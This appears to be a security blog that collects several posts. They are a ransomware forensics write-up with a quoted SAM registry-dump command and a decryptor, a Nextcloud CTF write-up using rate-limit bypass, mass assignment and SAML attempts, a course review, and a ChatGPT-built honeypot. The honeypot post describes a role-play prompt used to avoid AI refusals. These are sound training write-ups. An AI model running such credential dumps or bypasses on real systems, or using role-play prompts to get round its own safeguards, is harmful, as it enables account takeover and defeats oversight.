• (HackTool:Win32/LaZagne) C:\Users\tommyxiaomi\Documents\browser-pw-decrypt.exe

• (SAM dumping) C:\Windows\System32\cmd.exe(cmd.exe /c reg.exe save hklm\sam C:\Users\TOMMYX~1\AppData\Local\Temp\crkrbigyfjqk)

Almost all of them are self explainatory - apart from intel.exe. Could it be the actual crypter? Unfortunately all of the above executables can no longer be found at their destination. So can we somehow obtain the files? We don't have *.pcap file to grab the binary stream, we don't have access to any memory dumps for more binary dumping from RAM.

But there is another place we can look for this file.

Bingo.

Windows Defender Quarantine

We can't access the binaries becasue of how they are stored in the quarantine.

So for that I'm using a Python scriptdefender-dump.py after I've mounted the AD1 image with the FTK Imager.

When perfoming this operation on Windows - under no circumstances turn the Windows Defender off. Use the directory exclusion because they will keep being qurantined :)

Crypter (intel.exe)

Let's analyze what it is doing (dotPeek).

1. CTF Safeguard (do not run on the CTF participant system if mistakendly run by one).

2. Generate user/faction ID (it is visible on the ULTIMATE.hta).

3. Create CoreEncrypter object.

4. Iterate recursively over all directory entries and run the encryption on files, unless they don't qualify for encryption.

At this point we are ready to write decryptor. "Missing" part is a Faction ID we have obtained from the ransom note.

using System.Text;
using System.Security.Cryptography;

const string salt = "0f5264038205edfb1ac05fbb0e8c5e94";
const string UID = "5K7X7E6X7V2D6F";

var filePath = "Applicants_info.xlsx.korp";
var password = GetHashCode(UID, salt);

DecryptFile(filePath, password);

void DecryptFile(string encodedFilePath, string password)
{
    if (!encodedFilePath.EndsWith(".korp"))
    {
        throw new ArgumentException(encodedFilePath);
    }

    byte[] buffer = new byte[ushort.MaxValue];
    var rfc2898DeriveBytes = new Rfc2898DeriveBytes(password, new byte[8] { 0, 1, 1, 0, 1, 1, 0, 0 }, 4953);
    var rijndaelManaged = new RijndaelManaged();
    rijndaelManaged.Key = rfc2898DeriveBytes.GetBytes(rijndaelManaged.KeySize / 8);
    rijndaelManaged.Mode = CipherMode.CBC;
    rijndaelManaged.Padding = PaddingMode.ISO10126;
    rijndaelManaged.IV = rfc2898DeriveBytes.GetBytes(rijndaelManaged.BlockSize / 8);

    using (var encodedFileStream = new FileStream(encodedFilePath, FileMode.Open, FileAccess.Read))
    {
        var decryptedFilePath = encodedFilePath.Replace(".korp", string.Empty);
        using (var decryptedFileStream = new FileStream(decryptedFilePath, FileMode.Create, FileAccess.Write))
        using (var cryptoStream = new CryptoStream(decryptedFileStream, rijndaelManaged.CreateDecryptor(), CryptoStreamMode.Write))
        {
            int count;
            do
            {
                count = encodedFileStream.Read(buffer, 0, buffer.Length);
                if (count != 0)
                    cryptoStream.Write(buffer, 0, count);
            }
            while (count != 0);
        }
    }
}

string GetHashCode(string pass, string salt)
{
    var password = pass + salt;
    using (var cryptoServiceProvider = new SHA512CryptoServiceProvider())
    {
        byte[] bytes = Encoding.UTF8.GetBytes(password);
        return Convert.ToBase64String(cryptoServiceProvider.ComputeHash(bytes));
    }
}

Running the code against the encrypted XLSX file yields restored file. Because I don't want to deal with the potential malware in the XLSX file - I unzip the file and uses Visual Studio Code search functionality to grab the flag.

Additional reading

• What is an AD1?

• How to Extract Quarantine Files from Windows Defender

• ⭐ Official HTB write-up

The Plan

Challenge URL: https://tryhackme.com/jr/midsummer

There is something I wanted to try since I've watched videos of people creating games without any programming knowledge whatsoever. After I have created a honeypot using the ChatGPT v3, I'm ready to solve the CTF using AI only: ChatGPT and Bing AI (mostly strict mode) - latter because it has internet access.

For the readability reason, I'm not going to paste whole conversations, but the important bits.

Recon

For me, the competition starts before launching the first challenge. In the introductory part, I can read that

In this room, every task will allow you to gain access to a new Midsummer Corp employee. On every account you can also find a piece of the final puzzle fernflower_flag[1-6].png, which you will need to complete the last quest.

It indicates that the final flag or answer (the Crown Jewels) is distributed in six parts and placed somewhere on the file systems (presumably) of six accounts. The number of challenges (Puck, Leshy, Baba Yaga, Boruta, Twardowski and Popiel) is also six - so that is a match - one account, one challenge - one part of the final flag.

It is also worth noting that two years ago I have participated in the CTF organized by the Securing and my write-up won that year's competition. If you haven't read it yet, I strongly recommend it because it was my first experience of Securing team potential - just see what platform did they use to host the event 😉.

The Setting

Legend has it that the fern flower appears on the eve of the summer solstice at the stroke of midnight. It can only be found deep in the forest, where it grows in a secret and hidden spot known only to the bravest and most skilled of seekers. Those who are lucky enough to find it and pick it up at the right moment are granted great powers and blessings and may even have their wishes come true.

Securing chosen Kupala Night as a topic of this CTF.

I like that because the elusive fern flower is a great analogy to the flag that participants are looking for in the competition.

Also, what ChatGPT didn't mention - fern flower does not exist. Ferns do not bloom.

If you are not familiar with that legend of blooming fern, here are some of my recommendations to familiarize with:

• absolutely amazing Polish folk rock band - Żywiołak (Elemental); their songs focus on the Kupala Night and Slavic mythology

• "Kwiat Paproci" ("Fern Flower") book series by Katarzyna Berenika Miszczuk

Anyway, let's look at the challenges names in the context of that all - are those names chosen arbitrary or do they have some meaning that could help to solve tasks?

And maybe bot can drop us some ideas of what the challenges may be about?

Interesting - but here is crucial to remember one thing - when OpenAI model doesn't know the answer, it comes up with some (here, here and here). This is just how these kinds of model works. For example, I've asked a Bing AI to find some information about one of the challenges suggested by ChatGPT - and it looks like the bot just made that one up.

The Platform

The application is based on the NextCloud server (GitHub - nextcloud/server). The software and the configuration have been intentionally made vulnerable.

According to the GitHub it is a PHP server with JavaScript frontend for the data storage/management.

Tag cloud:

Interestingly, there is a hacktoberfest tag there. I've dug deeper and found out Nextcloud is participating in Hacktoberfests in the years 2016 and 2017 (post from 2016). So just for future reference, I'm adding a pull requests list applied during that event because of the following reasons:

• Securing team could be using an older version of Nextcloud Server,

• Securing team could be introducing/reverting some pull requests to include vulnerabilities,

• both

Ok, let's start with the actual challenge.

Midsummer Corp (sanity check)

For the sake of consistency - most actions I'll be performing on the Kali Linux, partially becasue I couldn't connect openvpn on Windows.

I'm connecting to the VPN sudo openvpn thm-eu1.vpn and test the connection using curl -IL 10.10.21.207 to roughly see what headers are being exchanged. Some of them:

Server: Apache/2.4.56 (Debian)
X-Powered-By: PHP/8.1.18

X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Content-Security-Policy: default-src 'none';base-uri 'none';manifest-src 'self';script-src 'self';style-src 'self' 'unsafe-inline';img-src 'self' data: blob:;font-src 'self' data:;connect-src 'self';media-src 'self';frame-ancestors 'self';form-action 'self'

Bing AI on HTTP Headers

The sanity check question is to find the base URL of the application. When you look closely - on the footer there is some text (which often contains redirection to the landing page). This is how the page looks like when adding a following CSS rule.

* {
  color: white;
}

So I hover on the Midsummer Corp link - it leads to https://files.midsummer.corp.local/.

I'm adding that to the hosts and browsing the page again. Unfortunately, the page seems not to be served over HTTPS.

# THM
10.10.21.207 files.midsummer.corp.local

From now on, I'll be using the Request Blocking feature of Firefox to not load the background image - the page looks much easier to browse and the size of the image is huge!

Source Code

To be honest - that's the longest .htaccess file I've ever seen - 132 lines.

$ wc -l .htaccess
132 .htaccess

I've then asked Bing AI to explain to me what some of the sections of that file are doing.

When comparing this file with the current version on the GitHub - there are additional lines under the #### DO NOT CHANGE ANYTHING ABOVE THIS LINE #### comment.

ErrorDocument 403 /index.php/error/403
ErrorDocument 404 /index.php/error/404
<IfModule mod_rewrite.c>
  Options -MultiViews
  RewriteRule ^core/js/oc.js$ index.php [PT,E=PATH_INFO:$1]
  RewriteRule ^core/preview.png$ index.php [PT,E=PATH_INFO:$1]
  RewriteCond %{REQUEST_FILENAME} !\.(css|js|svg|gif|png|html|ttf|woff2?|ico|jpg|jpeg|map|webm|mp4|mp3|ogg|wav|wasm|tflite)$
  RewriteCond %{REQUEST_FILENAME} !/core/ajax/update\.php
  RewriteCond %{REQUEST_FILENAME} !/core/img/(favicon\.ico|manifest\.json)$
  RewriteCond %{REQUEST_FILENAME} !/(cron|public|remote|status)\.php
  RewriteCond %{REQUEST_FILENAME} !/ocs/v(1|2)\.php
  RewriteCond %{REQUEST_FILENAME} !/robots\.txt
  RewriteCond %{REQUEST_FILENAME} !/(ocm-provider|ocs-provider|updater)/
  RewriteCond %{REQUEST_URI} !^/\.well-known/(acme-challenge|pki-validation)/.*
  RewriteCond %{REQUEST_FILENAME} !/richdocumentscode(_arm64)?/proxy.php$
  RewriteRule . index.php [PT,E=PATH_INFO:$1]
  RewriteBase /
  <IfModule mod_env.c>
    SetEnv front_controller_active true
    <IfModule mod_dir.c>
      DirectorySlash off
    </IfModule>
  </IfModule>
</IfModule>

Version 26.0.0 (/status.php)

Requesting status.php

Ok so, unfortunately, it's not as outdated as I thought it would be - the current version at the time of writing this article is 26.0.2. Couple of interesting commits missing in the 26.0.0

🔸 sec(deps): Update guzzlehttp/psr7

Updates guzzlehttp/psr7 from version 2.4.3 to 2.4.5 - here is the diff. Basically HTTP headers validation.

🔸 fix(security): Mark recording_servers key appconfig as private as it contains a secret

Well, that could be worth checking because of some "secret".

🔸 clear encrypted flag when moving away from encrypted storage

🔸 hide shared files located in group folder's trash bin

Maybe some data exfiltration from the shared files by looking in the group folder's trash bin?

🔸 fix(files_sharing): Allow file actions other than download for hide download shares

Maybe the file download action is still available?

🔸 fix(lostpassword): Also rate limit the setPassword endpoint

Paired with feat(security): Allow to opt-out of ratelimit protection, e.g. for testing on CI by the same author. Adding some comments/attributes on core/Controller/LostController->setPassword(..) and response throttling - most certainly to prevent brute-forcing.

🔸 fix: Always create user directory when transferring files to new users

Another way to unauthorized read?

/cron.php

Requesting cron.php

/ocs/v1.php, /ocs/v2.php

Ok, I'm deciding to not chase the rabbit and start doing the challenges.

Puck (intern)

Responsible for creating chaos and confusion to distract people from the company's true intentions

It does sound mischievous.

From the task description, we know that the Puck's password is accessible for us, somewhere in the application - and that the brute-force attack is not required. To be honest, I'm surprised that I haven't stumbled upon the plaintext password so far, as it is often "hidden" in the page source, some page or known URL (like robots.txt).

So I'm going back to the page source of the "Direct log in". I see there is some quite informative JS code in the head tag

I am pasting it in the VSCode, and I'm seeing something useful.

And success - first credentials are puck:sfLfSNYavTD4PL4Z.

Getting the flag from Fern_flower_ritual_shard1.txt. I'm also downloading a part of the final flag (fernflower_flag1.png).

Now, I noticed that 1 file is hidden (information under the file list). So, I went to Files settings and enabled Show hidden files.

On the sidenote, research folder contains *.txt files with fern AI-generated content (verified on three AI detectors) :). And some screens from social media

Profile: https://www.facebook.com/fernflowers17/, original content:

In the hidden folder .mail I found mails coming from different members of the fern team (like Baba Yaga and Boruta). One of the emails is crucial for me

That helped me answer the last question in Puck challenge and get Leshy credentials (leshy:nQRbhRyxuDuU9GNd).

Leshy (Forest Tracker)

Leshy is a forest spirit who has an intimate knowledge of the forest and its inhabitants. His job is to lead the team to the locations where the fern flower grows and to keep a watchful eye on any unwanted visitors who may threaten their mission

It is worth noting that we are given a link to OWASP resource that could be helpful to bypass MFA on a Leshy account.

I started by browsing the source code, to see the MFA flow - and at first, I thought that I had found that the token is constant (234567) - but it didn't work.

So, I have to consult my assistants :)

And now I'm asking ChatGPT directly on that topic, knowing that the 234567 is crucial to solving that task.

Ok, now I've asked it to give me the example in Python.

After a few retries I have finished with that:

#!/usr/bin/python
import pyotp
import base64

def generate_totp_code(seed_value):
    totp = pyotp.TOTP(seed_value)
    return totp.now()

seed_value = base64.b32encode("234567".encode())
totp_code = generate_totp_code(seed_value)
print(totp_code)

Let's try it. Unfortunately, it doesn't work.

After unveiling the hint - of course, I can use a different user to add MFA to it, so I can have the code generator (because seed is the same, OTP also are the same).

Backup codes are not the same.

Because that secret code is the same for each user, we can use the same authentication codes generated for the puck.

I'm downloading both the flag and final flag PNG.

No additional findings are reported. Because it is a dedicated instance - I'm removing MFA from both users, in case I have to log in as one again.

Baba Yaga (Witchcraft Researcher)

Baba Yaga is an expert in dark magic and is responsible for researching and discovering new ways to harness the power of the fern flower for the company's purposes. Her extensive knowledge of spells and potions makes her an invaluable member of the team.

The task here is to come up with a rate limit bypass and brute-force the password reset token - possible by using HTTP headers modifications.

Remember when we listed some changes that were introduced in 26.0.2 but missing in 26.0.0? This sounds closely related to the scope of the task.

First, let's ask ChatGPT about those comments on LostController.php.

/Middleware/Security/RateLimitingMiddleware.php

And in the same Middleware:

That should be easy. In routes.php there is an endpoint for that password reset:

So, I fire up Burpsuite and proxy browser, intercept the request too /lostpassword/reset/form/{token}/babayaga and then add X-Forwarded-For header.

I am setting a new password for babayaga - that request also has to be intercepted and enhanced with X-Forwarded-For. After the password is changed, I log in as babayaga and extract the flag and shard.

Endpoint for resetting a password. I left it over for the next day becasue I couldn't find the exact value that is expected to be entered on the submission form. In the routes.php there is a /lostpassword/reset/form/{token}/{userId} but this is not an acceptable answer. The correct one is /lostpassword/reset/form/<TOKEN>/<USER> which could be found in the LostController->email(..).

No additional steps are to be done on that account.

Boruta (Trickster)

Boruta is a mischievous and unpredictable figure, known for his ability to shape-shift and his love of pranks and practical jokes. As the company's Trickster, Boruta uses his skills to distract and confuse their enemies, often leading them astray with illusions and false leads. Despite his playful nature, Boruta is fiercely loyal to the company and will stop at nothing to help them achieve their goals.

Boruta's account can be accessed only with "app password". Maybe it is related to the WebDAV interface I've been seeing on each account.

I can map the leshy files

But I can't do that obviously with boruta because I don't know his password - if he has set any.

So perhaps WebAuthn?

That also didn't seem to work. I'm reading the description once again. And looking at the Settings -> Security page.

• "Prerequisites**:** Access to any account."

• "Can you figure out a way to use an app password?"

• "Mass Assignment vulnerability"

And finally, it clicked when I saw there is an input I haven't seen before

Ok, so probably it is possible to cheat the API and add an app password to boruta instead of the currently logged-in user.

Ok, let's see the source code for that.

It looks like it is a right area - because of the allowed users collection with boruta name in it.

When I add loginName parameter

Makes sense because the first check means exactly that - if loginName is boruta and it is not empty - throw that firewall error. So to bypass it and simultaneously skip the second check - I just have to add whitespaces to the boruta.

Now, I'm using the method of mounting files via DAV interface

Remember to use explicitly -o ro, without it you won't be able to even read the contents of the file.

I'm copying the files I'm interested in.

sudo cp /mnt/dav-boruta/*.txt /eth/securing-midsummer-corp-2023
sudo cp /mnt/dav-boruta/fernflower_flag5.png /eth/securing-midsummer-corp-2023

One of the files contains a flag.

On Boruta's account, there are additional files related to CTF:

• Fern_flower_residual_shard4.txt - looks like a more AI-generated story

• fernflower_flag5.png - I don't know if that's an error, but so far, we have 1-3 and 5 final flag parts (Boruta is 4th account)

• twardowski_sso_config.msg.txt - message from Twardowski to Boruta about SSO configuration

  

• twardowski_sso_mess_msg.txt - just information to Boruta about the mentioned SSO config

I have tried to use that endpoint, asked ChatGPT to generate me some sample of SAML Response - but to no avail. Let's go to the next task.

Twardowski (Alchemist) - unsolved

Twardowski is a master of alchemy and uses his knowledge to create potions and elixirs that aid in the search for the fern flower. He is constantly experimenting with different ingredients and formulas to unlock the secrets of the flower's power. Twardowski's work is crucial to the company's mission, as his potions can provide the team with enhanced strength, speed, and intelligence.

Getting some help.

I've dug deeper in the application, looking for some SAML references. Because when looking at how the SAML Assertion is made, it felt like some metadata for that response is needed or at least useful.

I have updated the ChatGPT with the metadata XML, then proceeded to look for the other APIs in custom_apps\user_saml\appinfo\routes.php. I noticed apps/user_saml/saml/login endpoint and I viewed it via browser. I got the following redirection:

http://idp.midsummer.corp:5000/saml?SAMLRequest=nZJPbxoxEMXvlfIdor2z613CQixAoqF%2FkCggIDn0Eg32bGLJa7seb5t%2B%2B5hl29JIySFznJn383sjjwlq7fisCY9miz8apHDx4TLWU60N8XY6SRpvuAVSxA3USDwIvpt9W%2FIiZdx5G6ywOnmpe1sGROiDsqbTLeaTZL36tFx%2FWazupRQjkcMBqxxQ9IUEHJajCisYlgPByqsCrkaHPnTaO%2FQUSZMkgmOrAxI1uDAUwIQ4YUW%2Fx8oeu97nJWcjXhTfO%2FU8ZlYGQkt4DMHxLFPSpbWS1NQ1%2BlRY7%2FiAMZYdc3WyTZf7ozJSmYe30x5OS8S%2F7veb3ma923eU2Z8z3FgTX0O%2FQ%2F9TCbzdLv%2BaqZRGemEn1VaAzsA5ypqIuD86a%2B1lICiZnujjY4O3l%2FDT99FqDCAhwDg7Z53hHV%2FFuIv5xmolfp8Gx%2FpsfQ3h9bPkad52lOxV7SpvDDkUqlIok3%2Bcmdb2141HCDhJgm8wuczi%2Byc%2F%2F%2F%2Fc6TM%3D&RelayState=http%3A%2F%2Ffiles.midsummer.corp.local%2Fapps%2Fuser_saml%2Fsaml%2Flogin

I've asked my assistant if I can generate a SAML Assertion having the SAMLRequest.

I must admit that I'm following blindly the AI here, becasue I've never worked with SAML Auth.

A couple of messages later, I had a plan - and I was even given a Python lines to decode the SAMLRequest.

import base64
import zlib

saml_request = "nZJPbxoxEMXvlfIdor2z613CQixAoqF/kCggIDn0Eg32bGLJa7seb5t++5hl29JIySFznJn383sjjwlq7fisCY9miz8apHDx4TLWU60N8XY6SRpvuAVSxA3USDwIvpt9W/IiZdx5G6ywOnmpe1sGROiDsqbTLeaTZL36tFx/WazupRQjkcMBqxxQ9IUEHJajCisYlgPByqsCrkaHPnTaO/QUSZMkgmOrAxI1uDAUwIQ4YUW/x8oeu97nJWcjXhTfO/U8ZlYGQkt4DMHxLFPSpbWS1NQ1+lRY7/iAMZYdc3WyTZf7ozJSmYe30x5OS8S/7veb3ma923eU2Z8z3FgTX0O/Q/9TCbzdLv+aqZRGemEn1VaAzsA5ypqIuD86a+1lICiZnujjY4O3l/DT99FqDCAhwDg7Z53hHV/FuIv5xmolfp8Gx/psfQ3h9bPkad52lOxV7SpvDDkUqlIok3+cmdb2141HCDhJgm8wuczi+yc////c6TM="
decoded_data = base64.b64decode(saml_request)
decompressed_data = zlib.decompress(decoded_data, -zlib.MAX_WBITS)

<samlp:AuthnRequest xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol" 
  xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion"
  ID="ONELOGIN_ddc8c1abef1aec3cdae768fefa765c0642a48b3a" Version="2.0"
  IssueInstant="2023-06-09T16:08:22Z" Destination="http://idp.midsummer.corp:5000/saml"
  ProtocolBinding="urn:oasis:names:tc:SAML:2.0:bindings:HTTP-POST"
  AssertionConsumerServiceURL="http://files.midsummer.corp.local/apps/user_saml/saml/acs">
  <saml:Issuer>http://files.midsummer.corp.local/apps/user_saml/saml/metadata</saml:Issuer>
  <samlp:NameIDPolicy Format="urn:oasis:names:tc:SAML:1.1:nameid-format:unspecified"
    AllowCreate="true" />
</samlp:AuthnRequest>

Later I found out that all I need is the SAMLTool site. As for the SAML response validations goes, I found that

• SAMLResponse has to be sent via POST parameter (application/x-www-form-urlencoded) - Auth->processResponse() - application is using HTTP_POST Binding; parameter has to be base64 encoded (Response constructor)

• cookie saml-data has to be set and its value is provided in the initial response to GET http://files.midsummer.corp.local/apps/user_saml/saml/login - SAMLController->assertionConsumerService()

• validation is done in Response->isValid() - this method has ~300 lines with some portions commented out

Some of the requirements come from the settings - which I cannot see, so it's a bit hard to guess what went wrong.

This is my final ResponseXML that still is not valid. I have also tried both the assertion and message signing with a certificate generated on the SAMLTool.

<samlp:Response xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol"
    xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion"
    ID="_8e8dc5f69a98cc4c1ff3427e5ce34606fd672f91e6" Version="2.0"
    IssueInstant="2023-06-21T17:26:53Z">
    <saml:Issuer>http://idp.midsummer.corp</saml:Issuer>
    <samlp:Status>
        <samlp:StatusCode Value="urn:oasis:names:tc:SAML:2.0:status:Success" />
    </samlp:Status>
    <saml:Assertion xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
        xmlns:xs="http://www.w3.org/2001/XMLSchema" ID="_d71a3a8e9fcc45c9e9d248ef7049393fc8f04e5f75"
        Version="2.0" IssueInstant="2023-06-21T17:26:53Z">
        <saml:Issuer>http://idp.midsummer.corp</saml:Issuer>
        <saml:Subject>
            <saml:NameID SPNameQualifier="http://sp.example.com/demo1/metadata.php"
                Format="urn:oasis:names:tc:SAML:2.0:nameid-format:transient">
                _ce3d2948b4cf20146dee0a0b3dd6f69b6cf86f62d7</saml:NameID>
            <saml:SubjectConfirmation Method="urn:oasis:names:tc:SAML:2.0:cm:bearer">
                <saml:SubjectConfirmationData NotOnOrAfter="2024-01-18T06:21:48Z"
                    Recipient="http://files.midsummer.corp.local/apps/user_saml/saml/acs" />
            </saml:SubjectConfirmation>
        </saml:Subject>
        <saml:Conditions NotBefore="2023-06-21T17:26:53Z" NotOnOrAfter="2023-06-26T17:26:53Z">
        </saml:Conditions>
        <saml:AuthnStatement AuthnInstant="2023-06-21T17:26:53Z"
            SessionNotOnOrAfter="2023-06-26T17:26:53Z"
            SessionIndex="_be9967abd904ddcae3c0eb4189adbe3f71e327cf93">
            <saml:AuthnContext>
                <saml:AuthnContextClassRef>urn:oasis:names:tc:SAML:2.0:ac:classes:Password</saml:AuthnContextClassRef>
            </saml:AuthnContext>
        </saml:AuthnStatement>
        <saml:AttributeStatement>
            <saml:Attribute Name="alias"
                NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:basic">
                <saml:AttributeValue xsi:type="xs:string">twardowski</saml:AttributeValue>
            </saml:Attribute>
            <saml:Attribute Name="role"
                NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:basic">
                <saml:AttributeValue xsi:type="xs:string">sso</saml:AttributeValue>
            </saml:Attribute>
        </saml:AttributeStatement>
    </saml:Assertion>
</samlp:Response>

Above XML is not complete - but I've seen that some of the properties like `InResponseTo` are not validated if not present - I have omitted them here.

Last Resort

Because I couldn't progress further without twardowski account, my journey ends here. Or is it?

I have 4/6 pieces and that is enough to get the part of the phrase used to create a flag.

The fern flower reveals ...

Because of how THM presents the answer text boxes, I also know the exact length of the flag.

**************{***********************************}
Midsummer_Corp{Th3_f3r**f!0w3r_r3**@1*************}

Creative Bing AI wasn't much of a help.

ChatGPT responses make me wonder why AIs have issues counting the length of the word.

Brute forcing answers is against the rules.. So I can only guess it has something to do with the saying "The fern flower reveals itself only to the bravest".

Conclusions

• Would it be possible to solve the whole CTF using only an AI processor? Despite the fact, it was a bit of pain to use in this event - I really think it shines when it comes to pure binary and mathematical operations. I've seen reverse challenges solved after one prompt, but it should be understandable that it won't happen for tasks that require pentesting and live analysis of the application flow.

• It takes longer to prompt (guide) the AI through the challenge, but when you are in total black - I think it is easier and more efficient to do. This is especially true with Bing AI which links you more resources to read on the topic which can give you additional insight.

Overall, I had fun solving the challenges, and definitely I want to see the solution for that SAML task - to see what did I did wrong.

HackTheBox is currently running a 20% discount on Academy Silver Yearly Subscription and I thought I might as well finally publish a review of the Academy portal. Especially, because I've been using it since 2021 and I think everyone should also give it at least a try.

For the test run I have chosen Tier III module "Attacking Authentication Mechanisms" mainly because other challenge gives me really hard time with SAML Response validation.

Single Module Cost

Costs when buying "raw" cubes, without any subscription:

• Tier I modules cost 50 cubes (£4)

• Tier II modules cost 100 cubes (£8)

• Tier III modules cost 500 cubes (£40)

• Tier IV modules cost 1000 cubes (£80)

Visual Design

Modules are divided into sections, which are clear and easy to read. Lessons content contains visual helps like images, graphics and well styled text (all personal opinion).

There is a theoretical and practical part. Most practical lessons rewards you with cubes (that way you can get back 20% of cubes you spent to unlock the module).

Cheatsheet

Exactly what is says. Collection of useful commands and some key notes from the module.

Parrot Pwnbox

Very handly and neat system. You just click "Launch" and literally within few seconds the preconfigured Parrot OS appears.

You can even download the ISO for the same OS from the Parrot Security site.

Responsive and ready to go. See what STÖK and others say about it.

Rewards

After you complete a module, you get the achievemnt-like popup and possiblity to share that completion details with others.

Personally, I really love that sense of accomplishment :)

Silver Annular Cost Analysis

Notice, that all prices are given without VAT. In my country I have to add 23%.

Let's break it one by one.

• Tier 0: 21 modules x 10 = 210 cubes

• Tier I: 10 modulesx x 50 = 500 cubes

• Tier II: 9 modules x 100 = 900 cubes

Each module completed gives 20% cubes back - with the exception of Tier 0 which gives 10 cubes back (full refund). So overall cost in cubes of all modules up to (including) Tier II is 1120 cubes or circa £88.

Both HTB Certified Penetration Testing Specialist and HTB Certified Bug Bounty Hunter exam voucher cost £150 so "one exam voucher per year" totals to £238.

Access to Bug Bounty Hunter path is covered in the previous calculations (includes modules up to Tier II).

Access to Penetration Tester path is covered in the previous calculations (includes modules up to Tier II).

Unlimited Pwnbox usage is hard to estimate becasue on Free Account you can launch it once a day for 120 minutes - is it enough? It depends - it's either you really focus and do the module on one sitting or do in at maximum 2-3 hours a day. But there is always and option to solve all lab tasks on your own system (like on Kali VM) or use that preconfigured Parrot OS.

Last year I've made a useful script to persist some settings and tools on the HTB Pwnbox. See it here.

CPE Credits should be looked at like necessity - it would be a serious negative if a program that cost that much would not give CPE credits.

As for the Lab Exercise guidance via Discord - I haven't got occasion to test it, but I assume that someone is available to chat and help you with the tasks.

Finally, it's a Silver Subscription so it gives 200 cubes each month, 1200 total (£96)

So finally, if you would like to buy everything separately, one day cubes, another day cubes and then come to conclusion that you want to get the certification - £334. And remember that's just a raw cost of all purchasable resources (cubes+exam voucher) without unlimited Pwnbox, CPE credits and lab guidance.

If you are commited and you think you would need the exam later - no brainer, get the yearly subscription, it will save you both money and a hassle in the future.

Introduction

Honeypots are decoy systems that mimic real targets and lure attackers into revealing their techniques and intentions. In this article, we will explore how to create honeypots using various tools and methods, and how to analyze the data collected from them. We will also discuss the benefits and challenges of using honeypots for cybersecurity purposes.

{Bing AI, Professional, Paragraph, Short}

At this point I would like to state, I'm no prompt engineering expert. So the methods I'm using are simply conclusions from previous experience, or articles I'm reading.

Idea

Yeah, why not? I've seen people creating games when they don't have any experience with programming or making a Minecraft hack. I thought, let's see by myself where I can get.

So the plan was to write a honeypot in Python, that will simply respond to connections on port 80 in a way it can "fool" a malicious actor. I'm using free online version of ChatGPTv3 for that - becasue I think it is the most accessible service.

Initial Prompt

I'm assuming there could be some ethical problems for AI to discuss some of the topics like port scanning techniques and such - so I've started with some older version of bypass to mitigate negative responses. "Assume a role of expert who is advising somebody else". In the first response advised me: it is important to thoroughly test and secure any honeypot software before deploying it in a real-world environment.

The first version of honeypot looks like this (original, non-altered version - comments are also from AI):

import socket

def honeypot():
    host = ''
    port = 80

    # create socket object
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

    # bind socket to a public host and a well-known port
    s.bind((host, port))

    # listen for incoming connections
    s.listen(5)

    print('Listening on port', port)

    while True:
        # establish connection with client
        conn, addr = s.accept()

        # log the connection
        print('Received connection from', addr)

        # send a fake HTTP response
        response = 'HTTP/1.1 200 OK\r\nContent-Length: 20\r\n\r\n<Honeypot response>'
        conn.sendall(response.encode())

        # close the connection
        conn.close()

if __name__ == '__main__':
    honeypot()

To be honest, it does its work. I had a question about what s.listen(5) means, which was answered in details.

Improvements

After that, I introduced some suggestions and more questions, for example, I wanted that:

• Content-Length to be calculated dynamically,

• string interpolation was used instead of format() ,

• get more information about the client from incoming connection,

• log the information in the file in a way I can later use the data to analyze it.

Before I concluded my work I asked ChatGPT if there are any security vulnerabilities that I should address before I start using it.

If you think about it - some of these hints are not making sense in honeypot - like filtering incoming connections or implementing authentication mechanisms.

So well, it's got a good point that honeypots could be used as a proxy or could act as an entrypoint for the internal network.

Implementation

Finally I've ended with following code

import socket
import datetime

HOST = ''  # Empty string means bind to all available interfaces
PORT = 80  # Port to listen on

# Create a socket object
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

# Bind the socket to a public host and port
s.bind((HOST, PORT))

# Set the socket to listening mode with a maximum backlog of connections
s.listen(5)

print(f'Honeypot is listening on {HOST}:{PORT}')

# Open the log file for writing
with open('honeypot.log', 'a') as f:

    while True:
        # Wait for a connection
        conn, addr = s.accept()

        # Log the connection
        current_time = datetime.datetime.now()
        print(f'Received connection from {addr[0]}:{addr[1]} at {current_time}')
        f.write(f'{current_time}, connection from {addr[0]}:{addr[1]}\n')

        # Receive the data in small chunks and retransmit it
        data = b''
        try:
            while True:
                chunk = conn.recv(1024)
                if not chunk:
                    break
                data += chunk

                # Check if the data size is too large
                if len(data) > 1024*1024:
                    print(f'Data from {addr[0]}:{addr[1]} is too large, closing connection.')
                    f.write(f'{current_time}, data from {addr[0]}:{addr[1]} is too large, closing connection\n')
                    conn.close()
                    break

            # Send the response with a custom banner
            response = b'HTTP/1.1 200 OK\r\n'
            response += b'Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8g\r\n'
            response += b'Content-Type: text/html\r\n'
            response += b'Content-Length: 20\r\n'
            response += b'\r\n'
            response += b'This is not the web page you are looking for.'

            conn.sendall(response)

        except (socket.error, ConnectionResetError):
            print(f'Error receiving data from {addr[0]}:{addr[1]}, closing connection.')
            f.write(f'{current_time}, error receiving data from {addr[0]}:{addr[1]}, closing connection\n')

        except socket.timeout:
            print(f'Timeout error occurred when sending response to {addr[0]}:{addr[1]}, closing connection.')
            f.write(f'{current_time}, timeout error when sending response to {addr[0]}:{addr[1]}, closing connection\n')

        finally:
            # Log the request
            f.write(f'{current_time}, request from {addr[0]}:{addr[1]}, data: {data.decode("utf-8", "ignore")}\n')
            # Close the connection
            conn.close()

Tests

First, I've tried a simple curl. It worked.. partially. For some reason, curl hanged. But I've ignored that issue and launched the nmap -sV -sC -p80 localhost -vvv scan. Interestingly, it was completed in a little below 4 minutes. So that simple program can slow down attackers to 4 minutes on a single port 80! Well, that's quite amazing. Interestingly, because we are logging each request in the file - I can see what nmap is doing behind the scenes.

The results of the scan are inconclusive.

Conclusion

Did it work? Yeah, I must say it works pretty well for the untargeted scans. It's far too little tests done, but I wanted mainly to check how it will handle such a specific task - and how would such honeypot perform under nmap scan.

There is still a lot of work to do, to make it more robust, add some more services, improve logging.

Resources

• Using AI To Build A Game From Scratch (NO Experience) | Matt Wolfe

• Can AI Create a Minecraft Hack? | LiveOverflow

• Extensive list of honeypots software

Background

